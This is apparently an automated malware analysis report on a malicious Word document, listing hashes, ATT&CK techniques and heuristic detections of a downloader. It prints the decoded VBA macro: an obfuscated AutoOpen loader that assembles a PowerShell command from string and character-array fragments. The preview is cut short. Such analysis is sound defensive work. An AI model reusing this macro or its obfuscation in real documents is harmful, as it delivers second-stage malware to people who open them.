Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a78b05b358d30e04…

MALICIOUS

Office (OLE)

226.0 KB Created: 2018-07-05 07:40:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: 0e9b085bcf0c21c393e10017b4fdedd0 SHA-1: ca3021568cdd820833989431c22dec092ab25996 SHA-256: a78b05b358d30e041b9e507f92440ff18e00a80df565e9bd15dcbd4f82541e14
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing an obfuscated AutoOpen VBA macro. This macro utilizes CreateObject and Shell calls, indicative of downloading and executing a second-stage payload. Specifically, the script attempts to construct and execute a PowerShell command, likely for payload delivery.

Heuristics 9

  • ClamAV: Doc.Downloader.Valyria-7165724-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-7165724-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15148 bytes
SHA-256: 4af74ec9c7a143857c0649c2a1b6005a13b8890fe90c4a2d3f908eb52e017f5d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "fvnhmznjuhIDG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   WZRkt = PJPmUf / jpULYW + (nQUmUz + WXthzB)
   brHQDO = kCTzXZ / ciRmH + (FFfPur + mWFViC)
   cEITY = jRTVbW / uKPMt + (fWMrVL + JOzzV)
   QJaAwE = UnXIwm / BJsKq + (EApofz + KzuqJ)
   ziJTi = ZoMuTV / rLqJkF + (rQMnH + jRTVz)
PizJfzbJbWha (IdhahA + EYzbTjFuK + mSEZnEkjOb + zwwrKhbfmw)
   wfjQar = JPQkQ / RPMjPq + (cLNkjf + wNJBp)
   VXXYKY = GTBlvE / sHKfVk + (kRwju + PwGOvw)
   spIFSu = rLzlb / GGwVTj + (kFYoP + iKNmpw)
   vfGsKO = hAwCq / RCHokP + (QjSVM + zHUruM)
End Sub


Attribute VB_Name = "zSCaDpBtGzwT"
Function IdhahA()
On Error Resume Next
ZIjVF = DXnjc / cJzwq * 68363 - GCJCQ * IXdPB / jrmViQ / 75815 * tJmJio + 48784 * PcpHI
   inMzD = (52994 - zwvjm / 11591 / wWbIma - 19480 - ijhEvj - XimlfT + ziTGOi) * 41782 / lhUJCO - 30941 - 77632
   ZlJVfY = LKTHZ / PYjZEo * 88513 - hYTLFQ * pEzDBz / vjzuqz / 16394 * PMJwOQ + 54269 * ZamwrM
   QPtwPU = hNluZ / jUFZs * 59866 - ETpIn * ouUBab / hzFhp / 36728 * PKTIjT + 66373 * ioMVdO
   qiEfQw = czbNuA / fJZzpf * 22959 - Zmvzjm * jHtNnp / kSNUam / 67208 * irjtit + 79939 * ztlOJ
VwmkiM = "wershell" + "         " + "        " + "  . " + Chr(40) + " " + "$Env" + ":COmS"
QGQHw = ZHlvsL / oOfDrP * 95915 - AXcop * Baufj / iFcAj / 90455 * jiXjvN + 58223 * NJDQnk
   GmuHs = IlQBAS / XtsTKJ * 31379 - ozUwP * pLnKub / jDzEU / 81690 * ZhiSRj + 92270 * iKVKBS
   ioTHq = hrPLC / jmfXw * 40545 - ldoja * hnRqP / XmptMN / 75570 * KzfTj + 21268 * rbdjU
SEMQDwBS = "pec[" + "4,24" + ",25]-j" + "OIn''" + Chr(41) + " " + Chr(40) + " -jOIN " + Chr(40) + " [CHar[" + "]] " + Chr(40) + "122 ," + " 47 , 56," + "41 ,99 ,4"
LdFTZ = qFqdrq / OpSUiG * 36610 - ijvrd * ojZjNO / trkcz / 8839 * NaCEHp + 91889 * shnLVY
   TsdZz = kSIAHq / ztwuXQ * 9941 - GchBn * BRkkGJ / ltNkKw / 89493 * SjCzj + 23210 * mhpDmp
   KbwABV = tdcTV / hrfCfo * 7624 - qkojJr * wCsBNz / BDEmrJ / 16914 * iVahKq + 15613 * qjcNT
UNwwNP = "8 ,59 , " + "41,1" + "15,49, " + "60 , " + "52 , 59 " + ", 61 ," + "42, 126 ," + " 16, 59" + " , 4"
XJjiAX = AjjMz / JMRKQo * 92342 - CHjDfC * DWFYcR / APLCv / 29922 * TzzzD + 46249 * mbZYUR
   YtpCh = unOSE / oRhSm * 46472 - jTfqD * fRUUU / FEpIn / 70831 * XudZLS + 43458 * wLiNB
   DiVUV = JbnXSw / BwNtj * 55037 - IjGciS * ujAIz / wMjjau / 8571 * YMalb + 31656 * dLfopm
tFjjjwaB = "2,112 ,9 " + ", 59" + ",60,29 ," + " 50, " + "55 ,59, " + "48 ,42," + "101 , " + "122,46 ," + "58, 18" + " , 99 " + ",121" + " , 5"
CtCmA = zaSuI / JwJthv * 1422 - GuTYjz * GqHStt / nPlwqV / 93920 * GRKXu + 94817 * lfGQj
HZCMG = "4 , 42," + "42,46" + " , 100 ," + "113," + "113," + " 40, 63,5" + "3, 55, " + "42 , 108 " + ", 106,1" + "12, 61,49" + " ,51 ,"
iFBSq = KcOFPL / HjEijC * 75676 - NJFlF * bLdNp / pHtoDG / 36357 * pvSilG + 55994 * BlzBVX
   mDDGuc = YlKsXD / wioIQ * 41855 - wzYYhu * fJrrW / jkJSPz / 34508 * QRNOGN + 41162 * VqoAjq
   wjkfjQ = sahEAp / bcjrN * 34496 - aAwbfK * PnJSqw / XVnMYJ / 50153 * ECcGl + 19506 * RdJwF
bjhkOIpH = "113," + "57, 61 ," + "107, 21," + "53, 109," + " 9,17 ,10" + "2,113" + " ,30" + " , 54, " + "42 , 42, " + "46 ,10" + "0, 113 ," + " 113, "
MhQscS = BMXMU / sTDQf * 64846 - JbhAj * BCVHtj / kDQAnn / 98577 * MtqJi + 98566 * VwTKWT
   AQMoRw = Eifqlo / Ccriz * 93711 - qrBoCh * oiKLL / Pkbwh / 26096 * oLdoNJ + 35441 * qSnUbD
TQwQhNUc = "41 ,41, 4" + "1, 112 " + ", 49 , 5" + "1 , 4" + "3 , 44 , " + "51,63 "
IdhahA = VwmkiM + SEMQDwBS + UNwwNP + tFjjjwaB + HZCMG + bjhkOIpH + TQwQhNUc
   AORGP = ViZWnS / tAlPs * 59785 - NasOf * PWrkPG / QwSwa / 48625 * HJnnf + 52255 * ZmiMKi
   zflOQo = OsjETP / nHoIw * 88766 - VBKRVj * oNoqvo / NGiPp / 97539 * sZPiQV + 92202 * XpumMi
   QSXGqQ = RCFISV / vqLjwh * 78559 - mkGKi * BOMuZ / jbbBsr / 85883 * dsKlJT + 96437 * fjFMzq
   ZVCbRj = npHhHl / hppTPG * 7259 - FjEKpj * XEbzT / wuwIj / 14920
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.